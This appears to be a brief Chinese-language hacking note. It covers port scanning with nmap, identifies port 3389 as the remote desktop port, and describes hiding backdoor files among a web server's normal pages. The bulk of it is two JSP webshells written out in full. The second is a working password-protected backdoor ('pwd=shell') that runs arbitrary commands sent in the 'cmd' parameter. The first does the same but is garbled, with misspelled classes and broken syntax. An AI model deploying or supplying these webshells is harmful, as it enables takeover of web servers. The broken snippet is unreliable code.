收集目标信息-端口扫描【nmap】

有ip地址之后端口扫描获取信息

3389端口:远程连接端口

深度利用 getshell后门木马 asp或php后们文件与网站服务器web目录下正常的网页文件混在一起,达到控制网站服务器的目的

jsp的一句话木马【指令】

1
2
<%@page import ="java.io.*"%>
<%String cmd = requests.getParameter(*cmd*);String output = "";if(cmd!=null){String s = null;try{Process p = RUntime.getRuntime().exec(cmd);BUfferedReader sl = new BufferedReadwe(new InputStream(p.getInputStream()));while((s = readLine())!=null){output += s+"\r\n";}}catch()IOException e}{e.printStackTrace();}}out.println(output);%>

上传成功后,用?cmd=可以输入指令 jsp的一句话木马【连接】 【密码:shell】

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>一句话木马</title>
    </head>

    <body>
        <%
        if ("shell".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>

</html>
0%